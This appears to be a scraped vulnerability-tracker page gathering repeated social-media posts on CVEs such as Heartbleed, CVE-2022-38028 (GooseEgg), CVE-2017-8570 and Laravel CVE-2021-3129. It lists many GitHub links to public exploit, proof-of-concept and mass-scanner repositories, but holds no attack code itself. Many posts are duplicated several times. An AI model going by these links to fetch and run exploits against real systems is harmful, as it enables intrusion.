https://github.com/DisK0nn3cT/MaltegoHeartbleed
https://github.com/0x90/CVE-2014-0160
https://github.com/cyphar/heartthreader
https://github.com/sensepost/heartbleed-poc
https://github.com/mpgn/heartbleed-PoC
https://github.com/hreese/heartbleed-dtls
https://github.com/marstornado/cve-2014-0160-Yunfeng-Jiang
https://github.com/siddolo/knockbleed
https://github.com/isgroup/openmagic
https://github.com/FiloSottile/Heartbleed
https://github.com/WildfootW/CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed
https://github.com/ice-security88/CVE-2014-0160
https://github.com/amerine/coronary
https://github.com/caiqiqi/OpenSSL-HeartBleed-CVE-2014-0160-PoC
https://github.com/roganartu/heartbleedchecker-chrome
https://github.com/iSCInc/heartbleed
https://github.com/takeshixx/ssl-heartbleed.nse
https://github.com/hmlio/vaas-cve-2014-0160
https://github.com/fb1h2s/CVE-2014-0160
https://github.com/mozilla-services/Heartbleed
https://github.com/xlucas/heartbleed
SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##updated 2023-02-03T05:02:37
15 posts
@ntkramer gonna enrich your toot with my reply: Microsoft article
What I took out of it was APT28's tool GooseEgg exploited CVE-2022-38028 (7.8 high, disclosed 11 October 2022 by Microsoft; Windows Print Spooler Elevation of Privilege Vulnerability) as a zero-day since at least June 2020 (possibly as early as April 2019) which was 2 years 4 months to 3 years 6 months.
To that end, CISA added CVE-2022-38028 to the Known Exploited Vulnerabilities (KEV) Catalog today: https://www.cisa.gov/news-events/alerts/2024/04/23/cisa-adds-one-known-exploited-vulnerability-catalog
##Hot off the press! CISA adds CVE-2022-38028 to the Known Exploited Vulnerabilities (KEV) Catalog after Microsoft's blog post states that Russian APT28 exploited it as a zero-day for years. 🔗https://www.cisa.gov/news-events/alerts/2024/04/23/cisa-adds-one-known-exploited-vulnerability-catalog
#CVE_2022_38028 #eitw #activeexploitation #kev #CISA #KnownExploitedVulnerabilitiesCatalog #Russia #cyberespionage #threatintel
##Russian hackers’ custom tool exploits old Windows Print Spooler flaw (CVE-2022-38028) https://www.helpnetsecurity.com/2024/04/23/cve-2022-38028-exploits/ #cyberespionage #Don'tmiss #Microsoft #Hotstuff #exploit #Windows #0-day #News #APT #CVE
##The post-compromise tool, which is said to have been used since at least June 2020 and possibly as early as April 2019, leveraged a now-patched flaw that allowed for privilege escalation (CVE-2022-38028, CVSS score: 7.8). https://thehackernews.com/2024/04/russias-apt28-exploited-windows-print.html
##@mttaggart I think one of the key takeaways is that APT28, a Russian state actor publicly attributed to GRU Military Unit 26165, exploited CVE-2022-38028 as a zero-day for 2 years before it was publicly disclosed and patched:
##Since at least June 2020 and possibly as early as April 2019, Forest Blizzard has used the tool, which we refer to as GooseEgg, to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions.
@dangoodin Should your post read CVE-2022-38028?
##Microsoft said today that Russian hackers have been exploiting the vulnerability tracked as CVE-2022-38028 since at least 2020. That would make it an 0day at the time Microsoft patched it in October 2022. And yet, Microsoft has never acknowledged that vulnerability as such. What's up with that?
https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2022-38028
##Microsoft reported that APT28 (Fancy Bear, Forest Blizzard) used a custom tool to elevate privileges and steal credentials in compromised networks. This GooseEgg tool leveraged CVE-2022-38028 (7.8 high, disclosed 11 October 2022 by Microsoft; Windows Print Spooler Elevation of Privilege Vulnerability) as a zero-day since at least June 2020 (possibly as early as April 2019) which was 2 years 4 months. APT28 is publicly attributed to Russian General Staff Main Intelligence Directorate (GRU). IOC provided. 🔗 https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/
cc: @serghei @campuscodi @briankrebs @jwarminsky
#APT28 #cyberespionage #Russia #FancyBear #ForestBlizzard #CVE_2022_38028 #eitw #activeexploitation #GooseEgg
##@ntkramer gonna enrich your toot with my reply: Microsoft article
What I took out of it was APT28's tool GooseEgg exploited CVE-2022-38028 (7.8 high, disclosed 11 October 2022 by Microsoft; Windows Print Spooler Elevation of Privilege Vulnerability) as a zero-day since at least June 2020 (possibly as early as April 2019) which was 2 years 4 months to 3 years 6 months.
To that end, CISA added CVE-2022-38028 to the Known Exploited Vulnerabilities (KEV) Catalog today: https://www.cisa.gov/news-events/alerts/2024/04/23/cisa-adds-one-known-exploited-vulnerability-catalog
##Hot off the press! CISA adds CVE-2022-38028 to the Known Exploited Vulnerabilities (KEV) Catalog after Microsoft's blog post states that Russian APT28 exploited it as a zero-day for years. 🔗https://www.cisa.gov/news-events/alerts/2024/04/23/cisa-adds-one-known-exploited-vulnerability-catalog
#CVE_2022_38028 #eitw #activeexploitation #kev #CISA #KnownExploitedVulnerabilitiesCatalog #Russia #cyberespionage #threatintel
##The post-compromise tool, which is said to have been used since at least June 2020 and possibly as early as April 2019, leveraged a now-patched flaw that allowed for privilege escalation (CVE-2022-38028, CVSS score: 7.8). https://thehackernews.com/2024/04/russias-apt28-exploited-windows-print.html
##@mttaggart I think one of the key takeaways is that APT28, a Russian state actor publicly attributed to GRU Military Unit 26165, exploited CVE-2022-38028 as a zero-day for 2 years before it was publicly disclosed and patched:
##Since at least June 2020 and possibly as early as April 2019, Forest Blizzard has used the tool, which we refer to as GooseEgg, to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions.
@dangoodin Should your post read CVE-2022-38028?
##Microsoft said today that Russian hackers have been exploiting the vulnerability tracked as CVE-2022-38028 since at least 2020. That would make it an 0day at the time Microsoft patched it in October 2022. And yet, Microsoft has never acknowledged that vulnerability as such. What's up with that?
https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2022-38028
##Microsoft reported that APT28 (Fancy Bear, Forest Blizzard) used a custom tool to elevate privileges and steal credentials in compromised networks. This GooseEgg tool leveraged CVE-2022-38028 (7.8 high, disclosed 11 October 2022 by Microsoft; Windows Print Spooler Elevation of Privilege Vulnerability) as a zero-day since at least June 2020 (possibly as early as April 2019) which was 2 years 4 months. APT28 is publicly attributed to Russian General Staff Main Intelligence Directorate (GRU). IOC provided. 🔗 https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/
cc: @serghei @campuscodi @briankrebs @jwarminsky
#APT28 #cyberespionage #Russia #FancyBear #ForestBlizzard #CVE_2022_38028 #eitw #activeexploitation #GooseEgg
##updated 2023-02-02T05:01:39
6 posts
9 repos
https://github.com/SwordSheath/CVE-2017-8570
https://github.com/Drac0nids/CVE-2017-8570
https://github.com/5l1v3r1/rtfkit
https://github.com/MaxSecurity/Office-CVE-2017-8570
https://github.com/temesgeny/ppsx-file-generator
https://github.com/sasqwatch/CVE-2017-8570
https://github.com/erfze/CVE-2017-8570
Deep Instinct: Uncorking Old Wine: Zero-Day from 2017 + Cobalt Strike Loader in Unholy Alliance
A targeted operation against Ukraine by an unknown threat actor leveraged CVE-2017-8570 (7.8 high, disclosed 11 July 2017 by Microsoft, Microsoft Office RCE) for initial access. The decoy is a PPSX (PowerPoint Slideshow) file of a U.S. Army tank-mounted mine clearing blades manual. There are two stages in the infection chain, with the payload disguised as Cisco AnyConnect VPN file and the loader serves up a Cobalt Strike Beacon. Deep Instinct provides a technical analysis of the DLL, loader, and Cobalt Strike configs. IOC and MITRE ATT&CK TTPs listed.
#Ukraine #cyberespionage #threatintel #IOC #CobaltStrike #CVE_2017_8570
##Deep Instinct: Uncorking Old Wine: Zero-Day from 2017 + Cobalt Strike Loader in Unholy Alliance
A targeted operation against Ukraine by an unknown threat actor leveraged CVE-2017-8570 (7.8 high, disclosed 11 July 2017 by Microsoft, Microsoft Office RCE) for initial access. The decoy is a PPSX (PowerPoint Slideshow) file of a U.S. Army tank-mounted mine clearing blades manual. There are two stages in the infection chain, with the payload disguised as Cisco AnyConnect VPN file and the loader serves up a Cobalt Strike Beacon. Deep Instinct provides a technical analysis of the DLL, loader, and Cobalt Strike configs. IOC and MITRE ATT&CK TTPs listed.
#Ukraine #cyberespionage #threatintel #IOC #CobaltStrike #CVE_2017_8570
##Deep Instinct: Uncorking Old Wine: Zero-Day from 2017 + Cobalt Strike Loader in Unholy Alliance
A targeted operation against Ukraine by an unknown threat actor leveraged CVE-2017-8570 (7.8 high, disclosed 11 July 2017 by Microsoft, Microsoft Office RCE) for initial access. The decoy is a PPSX (PowerPoint Slideshow) file of a U.S. Army tank-mounted mine clearing blades manual. There are two stages in the infection chain, with the payload disguised as Cisco AnyConnect VPN file and the loader serves up a Cobalt Strike Beacon. Deep Instinct provides a technical analysis of the DLL, loader, and Cobalt Strike configs. IOC and MITRE ATT&CK TTPs listed.
#Ukraine #cyberespionage #threatintel #IOC #CobaltStrike #CVE_2017_8570
##Deep Instinct: Uncorking Old Wine: Zero-Day from 2017 + Cobalt Strike Loader in Unholy Alliance
A targeted operation against Ukraine by an unknown threat actor leveraged CVE-2017-8570 (7.8 high, disclosed 11 July 2017 by Microsoft, Microsoft Office RCE) for initial access. The decoy is a PPSX (PowerPoint Slideshow) file of a U.S. Army tank-mounted mine clearing blades manual. There are two stages in the infection chain, with the payload disguised as Cisco AnyConnect VPN file and the loader serves up a Cobalt Strike Beacon. Deep Instinct provides a technical analysis of the DLL, loader, and Cobalt Strike configs. IOC and MITRE ATT&CK TTPs listed.
#Ukraine #cyberespionage #threatintel #IOC #CobaltStrike #CVE_2017_8570
##The targeted operation utilized CVE-2017-8570 as the initial vector and employed a notable custom loader for Cobalt Strike, yet attribution to any known threat actor remains elusive. https://www.darkreading.com/cyberattacks-data-breaches/military-tank-manual-zero-day-ukraine-cyberattack
##The targeted operation utilized CVE-2017-8570 as the initial vector and employed a notable custom loader for Cobalt Strike, yet attribution to any known threat actor remains elusive. https://www.darkreading.com/cyberattacks-data-breaches/military-tank-manual-zero-day-ukraine-cyberattack
##updated 2023-02-01T05:05:19
2 posts
28 repos
https://github.com/ambionics/laravel-exploits
https://github.com/simonlee-hello/CVE-2021-3129
https://github.com/hupe1980/CVE-2021-3129
https://github.com/shadowabi/Laravel-CVE-2021-3129
https://github.com/qaisarafridi/cve-2021-31290
https://github.com/withmasday/CVE-2021-3129
https://github.com/FunPhishing/Laravel-8.4.2-rce-CVE-2021-3129
https://github.com/zhzyker/vulmap
https://github.com/ajisai-babu/CVE-2021-3129-exp
https://github.com/Zoo1sondv/CVE-2021-3129
https://github.com/qaisarafridi/cve-2021-3129
https://github.com/joshuavanderpoll/CVE-2021-3129
https://github.com/nth347/CVE-2021-3129_exploit
https://github.com/Axianke/CVE-2021-3129
https://github.com/0nion1/CVE-2021-3129
https://github.com/banyaksepuh/Mass-CVE-2021-3129-Scanner
https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP
https://github.com/zhzyker/CVE-2021-3129
https://github.com/MadExploits/Laravel-debug-Checker
https://github.com/JacobEbben/CVE-2021-3129
https://github.com/miko550/CVE-2021-3129
https://github.com/keyuan15/CVE-2021-3129
https://github.com/cuongtop4598/CVE-2021-3129-Script
https://github.com/aurelien-vilminot/ENSIMAG_EXPLOIT_CVE2_3A
https://github.com/SNCKER/CVE-2021-3129
https://github.com/idea-oss/laravel-CVE-2021-3129-EXP
Sysdig: LLMjacking: Stolen Cloud Credentials Used in New AI Attack
Sysdig reported on a cloud-based campaign leveraging stolen cloud credentials to target 10 cloud-hosted large language model (LLM) services. The goal is selling access and this attack is called "LLMjacking." (seriously who comes up with these stupid names? this better not show up in the next version of the CEH exam) Sysdig notes CVE-2021-3129 (9.8 critical, disclosed 12 January 2021, added to KEV Catalog 18 September 2023) was exploited to get credentials. Once initial access was obtained, the attackers exfiltrated cloud credentials and pivoted to the cloud environment, where they attempted to access local LLM models hosted by cloud providers. Sysdig provides a technical analysis and IOC.
Sysdig: LLMjacking: Stolen Cloud Credentials Used in New AI Attack
Sysdig reported on a cloud-based campaign leveraging stolen cloud credentials to target 10 cloud-hosted large language model (LLM) services. The goal is selling access and this attack is called "LLMjacking." (seriously who comes up with these stupid names? this better not show up in the next version of the CEH exam) Sysdig notes CVE-2021-3129 (9.8 critical, disclosed 12 January 2021, added to KEV Catalog 18 September 2023) was exploited to get credentials. Once initial access was obtained, the attackers exfiltrated cloud credentials and pivoted to the cloud environment, where they attempted to access local LLM models hosted by cloud providers. Sysdig provides a technical analysis and IOC.
updated 2023-02-01T05:01:22
4 posts
Tiens, le pwnage de la PlayStation, discuté depuis le début de l'année, repose sur une faille de sécurité datant de 2006!
"For some reason, the PS4/PS5 is vulnerable to CVE-2006-4304. By having invalid options, it is possible to cause a heap buffer overwrite and overread."
👇
https://hackerone.com/reports/2177925
"PS4/PS5: TheFloW discloses Kernel vulnerability relying on old bug from 2006, impacts PS4 up to 11.00 & PS5 up to 8.20, more details in May"
👇
https://wololo.net/2024/04/26/ps4-ps5-theflow-discloses-kernel-vulnerability-relying-on-old-bug-from-2006-impacts-ps4-up-to-11-00-ps5-up-to-8-20-more-details-in-may/
Tiens, le pwnage de la PlayStation, discuté depuis le début de l'année, repose sur une faille de sécurité datant de 2006!
"For some reason, the PS4/PS5 is vulnerable to CVE-2006-4304. By having invalid options, it is possible to cause a heap buffer overwrite and overread."
👇
https://hackerone.com/reports/2177925
"PS4/PS5: TheFloW discloses Kernel vulnerability relying on old bug from 2006, impacts PS4 up to 11.00 & PS5 up to 8.20, more details in May"
👇
https://wololo.net/2024/04/26/ps4-ps5-theflow-discloses-kernel-vulnerability-relying-on-old-bug-from-2006-impacts-ps4-up-to-11-00-ps5-up-to-8-20-more-details-in-may/
Tiens, le pwnage de la PlayStation, discuté depuis le début de l'année, repose sur une faille de sécurité datant de 2006!
"For some reason, the PS4/PS5 is vulnerable to CVE-2006-4304. By having invalid options, it is possible to cause a heap buffer overwrite and overread."
👇
https://hackerone.com/reports/2177925
"PS4/PS5: TheFloW discloses Kernel vulnerability relying on old bug from 2006, impacts PS4 up to 11.00 & PS5 up to 8.20, more details in May"
👇
https://wololo.net/2024/04/26/ps4-ps5-theflow-discloses-kernel-vulnerability-relying-on-old-bug-from-2006-impacts-ps4-up-to-11-00-ps5-up-to-8-20-more-details-in-may/
Tiens, le pwnage de la PlayStation, discuté depuis le début de l'année, repose sur une faille de sécurité datant de 2006!
"For some reason, the PS4/PS5 is vulnerable to CVE-2006-4304. By having invalid options, it is possible to cause a heap buffer overwrite and overread."
👇
https://hackerone.com/reports/2177925
"PS4/PS5: TheFloW discloses Kernel vulnerability relying on old bug from 2006, impacts PS4 up to 11.00 & PS5 up to 8.20, more details in May"
👇
https://wololo.net/2024/04/26/ps4-ps5-theflow-discloses-kernel-vulnerability-relying-on-old-bug-from-2006-impacts-ps4-up-to-11-00-ps5-up-to-8-20-more-details-in-may/
updated 2023-01-29T05:07:01
4 posts
10 repos
https://github.com/dorkerdevil/CVE-2021-21975
https://github.com/zhzyker/vulmap
https://github.com/CyberCommands/CVE2021-21975
https://github.com/GuayoyoCyber/CVE-2021-21975
https://github.com/Vulnmachines/VMWare-CVE-2021-21975
https://github.com/Al1ex/CVE-2021-21975
https://github.com/Henry4E36/VMWare-vRealize-SSRF
https://github.com/TheTh1nk3r/exp_hub
SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##updated 2023-01-29T05:06:49
2 posts
Group Policy Folder Redirection CVE-2021-26887
Two years ago (march 2020), I found this sort of “vulnerability” in Folder Redirection policy and reported it to MSRC. They acknowledged it with...
🔗️ [Decoder] https://link.is.it/bp55iz
##Group Policy Folder Redirection CVE-2021-26887
Two years ago (march 2020), I found this sort of “vulnerability” in Folder Redirection policy and reported it to MSRC. They acknowledged it with...
🔗️ [Decoder] https://link.is.it/bp55iz
##updated 2023-01-28T05:05:41
4 posts
12 repos
https://github.com/yukar1z0e/CVE-2018-13379
https://github.com/B1anda0/CVE-2018-13379
https://github.com/0xHunter/FortiOS-Credentials-Disclosure
https://github.com/pwn3z/CVE-2018-13379-FortinetVPN
https://github.com/milo2012/CVE-2018-13379
https://github.com/k4nfr3/CVE-2018-13379-Fortinet
https://github.com/Blazz3/cve2018-13379-nmap-script
https://github.com/jpiechowka/at-doom-fortigate
https://github.com/hackingyseguridad/directoriotraversal
https://github.com/W01fh4cker/Serein
https://github.com/Zeop-CyberSec/fortios_vpnssl_traversal_leak
SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##updated 2023-01-27T05:03:06
4 posts
2 repos
SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##Thank you to @havenwood for updating the ruby-versions repo for CVE-2024-27282! ruby-install users, please upgrade your ruby versions!
ruby-install --update
ruby-install ruby-3.0.7
ruby-install ruby-3.1.5
ruby-install ruby-3.2.4
ruby-install ruby-3.3.1
https://www.ruby-lang.org/en/news/2024/04/23/arbitrary-memory-address-read-regexp-cve-2024-27282/
#ruby #rubysec #cve #cve_2024_2782 #cve20242782
Thank you to @havenwood for updating the ruby-versions repo for CVE-2024-27282! ruby-install users, please upgrade your ruby versions!
ruby-install --update
ruby-install ruby-3.0.7
ruby-install ruby-3.1.5
ruby-install ruby-3.2.4
ruby-install ruby-3.3.1
https://www.ruby-lang.org/en/news/2024/04/23/arbitrary-memory-address-read-regexp-cve-2024-27282/
#ruby #rubysec #cve #cve_2024_2782 #cve20242782
Thank you to @havenwood for updating the ruby-versions repo for CVE-2024-27282! ruby-install users, please upgrade your ruby versions!
ruby-install --update
ruby-install ruby-3.0.7
ruby-install ruby-3.1.5
ruby-install ruby-3.2.4
ruby-install ruby-3.3.1
https://www.ruby-lang.org/en/news/2024/04/23/arbitrary-memory-address-read-regexp-cve-2024-27282/
#ruby #rubysec #cve #cve_2024_2782 #cve20242782
Thank you to @havenwood for updating the ruby-versions repo for CVE-2024-27282! ruby-install users, please upgrade your ruby versions!
ruby-install --update
ruby-install ruby-3.0.7
ruby-install ruby-3.1.5
ruby-install ruby-3.2.4
ruby-install ruby-3.3.1
https://www.ruby-lang.org/en/news/2024/04/23/arbitrary-memory-address-read-regexp-cve-2024-27282/
#ruby #rubysec #cve #cve_2024_2782 #cve20242782
Thank you to @havenwood for updating the ruby-versions repo for CVE-2024-27282! ruby-install users, please upgrade your ruby versions!
ruby-install --update
ruby-install ruby-3.0.7
ruby-install ruby-3.1.5
ruby-install ruby-3.2.4
ruby-install ruby-3.3.1
https://www.ruby-lang.org/en/news/2024/04/23/arbitrary-memory-address-read-regexp-cve-2024-27282/
#ruby #rubysec #cve #cve_2024_2782 #cve20242782
Thank you to @havenwood for updating the ruby-versions repo for CVE-2024-27282! ruby-install users, please upgrade your ruby versions!
ruby-install --update
ruby-install ruby-3.0.7
ruby-install ruby-3.1.5
ruby-install ruby-3.2.4
ruby-install ruby-3.3.1
https://www.ruby-lang.org/en/news/2024/04/23/arbitrary-memory-address-read-regexp-cve-2024-27282/
#ruby #rubysec #cve #cve_2024_2782 #cve20242782
Thank you to @havenwood for updating the ruby-versions repo for CVE-2024-27282! ruby-install users, please upgrade your ruby versions!
ruby-install --update
ruby-install ruby-3.0.7
ruby-install ruby-3.1.5
ruby-install ruby-3.2.4
ruby-install ruby-3.3.1
https://www.ruby-lang.org/en/news/2024/04/23/arbitrary-memory-address-read-regexp-cve-2024-27282/
#ruby #rubysec #cve #cve_2024_2782 #cve20242782
Thank you to @havenwood for updating the ruby-versions repo for CVE-2024-27282! ruby-install users, please upgrade your ruby versions!
ruby-install --update
ruby-install ruby-3.0.7
ruby-install ruby-3.1.5
ruby-install ruby-3.2.4
ruby-install ruby-3.3.1
https://www.ruby-lang.org/en/news/2024/04/23/arbitrary-memory-address-read-regexp-cve-2024-27282/
#ruby #rubysec #cve #cve_2024_2782 #cve20242782
Critical Vulnerabilities in Judge0 Lead to Sandbox Escape, Host Takeover https://www.securityweek.com/critical-vulnerabilities-in-judge0-lead-to-sandbox-escape-host-takeover/ #Malware&Threats #Vulnerabilities #CVE202428189 #CVE202429021 #Judge0
##Critical Vulnerabilities in Judge0 Lead to Sandbox Escape, Host Takeover https://www.securityweek.com/critical-vulnerabilities-in-judge0-lead-to-sandbox-escape-host-takeover/ #Malware&Threats #Vulnerabilities #CVE202428189 #CVE202429021 #Judge0
##Tanto Security: Judge0 Sandbox Escape
Judge0 is an open source service used to run arbitrary code inside a secure sandbox. Tanto Security disclosed vulnerabilities (including proofs of concept and exploit scripts) in Judge0 that allows an adversary with sufficient access to perform a sandbox escape and obtain root permissions on the host machine. h/t @buherator
#CVE_2024_29021 #CVE_2024_28185 #CVE_2024_28189 #CVE_2024_28185 #Judge0 #proofofconcept #vulnerability
##Tanto Security: Judge0 Sandbox Escape
Judge0 is an open source service used to run arbitrary code inside a secure sandbox. Tanto Security disclosed vulnerabilities (including proofs of concept and exploit scripts) in Judge0 that allows an adversary with sufficient access to perform a sandbox escape and obtain root permissions on the host machine. h/t @buherator
#CVE_2024_29021 #CVE_2024_28185 #CVE_2024_28189 #CVE_2024_28185 #Judge0 #proofofconcept #vulnerability
##Critical Vulnerabilities in Judge0 Lead to Sandbox Escape, Host Takeover https://www.securityweek.com/critical-vulnerabilities-in-judge0-lead-to-sandbox-escape-host-takeover/ #Malware&Threats #Vulnerabilities #CVE202428189 #CVE202429021 #Judge0
##Critical Vulnerabilities in Judge0 Lead to Sandbox Escape, Host Takeover https://www.securityweek.com/critical-vulnerabilities-in-judge0-lead-to-sandbox-escape-host-takeover/ #Malware&Threats #Vulnerabilities #CVE202428189 #CVE202429021 #Judge0
##Tanto Security: Judge0 Sandbox Escape
Judge0 is an open source service used to run arbitrary code inside a secure sandbox. Tanto Security disclosed vulnerabilities (including proofs of concept and exploit scripts) in Judge0 that allows an adversary with sufficient access to perform a sandbox escape and obtain root permissions on the host machine. h/t @buherator
#CVE_2024_29021 #CVE_2024_28185 #CVE_2024_28189 #CVE_2024_28185 #Judge0 #proofofconcept #vulnerability
##Tanto Security: Judge0 Sandbox Escape
Judge0 is an open source service used to run arbitrary code inside a secure sandbox. Tanto Security disclosed vulnerabilities (including proofs of concept and exploit scripts) in Judge0 that allows an adversary with sufficient access to perform a sandbox escape and obtain root permissions on the host machine. h/t @buherator
#CVE_2024_29021 #CVE_2024_28185 #CVE_2024_28189 #CVE_2024_28185 #Judge0 #proofofconcept #vulnerability
##Google Chrome security advisory: 4 security fixes, 3 externally reported. No mention of exploitation: 🔗 https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop_24.html
#Google #Chrome #vulnerability #PatchTuesday #CVE_2024_4058 #CVE_2024_4059 #CVE_2024_4060
##Google Chrome security advisory: 4 security fixes, 3 externally reported. No mention of exploitation: 🔗 https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop_24.html
#Google #Chrome #vulnerability #PatchTuesday #CVE_2024_4058 #CVE_2024_4059 #CVE_2024_4060
##Google Chrome security advisory: 4 security fixes, 3 externally reported. No mention of exploitation: 🔗 https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop_24.html
#Google #Chrome #vulnerability #PatchTuesday #CVE_2024_4058 #CVE_2024_4059 #CVE_2024_4060
##While Cisco's Event Response lists CVE-2024-20358 as "leveraged in these attacks," its own security advisory states:
The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.
🔗 CVE-2024-20358 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Command Injection Vulnerability
CISA's RSS feed showed that the security alert for the KEV additions created at 0800 ET, meaning it was coordinated and prepared in advance of Cisco's announcements. Because CISA only added the other two Cisco vulnerabilities, CVE-2024-20358 does not appear to be a known exploited vulnerability.
##While Cisco's Event Response lists CVE-2024-20358 as "leveraged in these attacks," its own security advisory states:
The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.
🔗 CVE-2024-20358 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Command Injection Vulnerability
CISA's RSS feed showed that the security alert for the KEV additions created at 0800 ET, meaning it was coordinated and prepared in advance of Cisco's announcements. Because CISA only added the other two Cisco vulnerabilities, CVE-2024-20358 does not appear to be a known exploited vulnerability.
##While Cisco's Event Response lists CVE-2024-20358 as "leveraged in these attacks," its own security advisory states:
The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.
🔗 CVE-2024-20358 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Command Injection Vulnerability
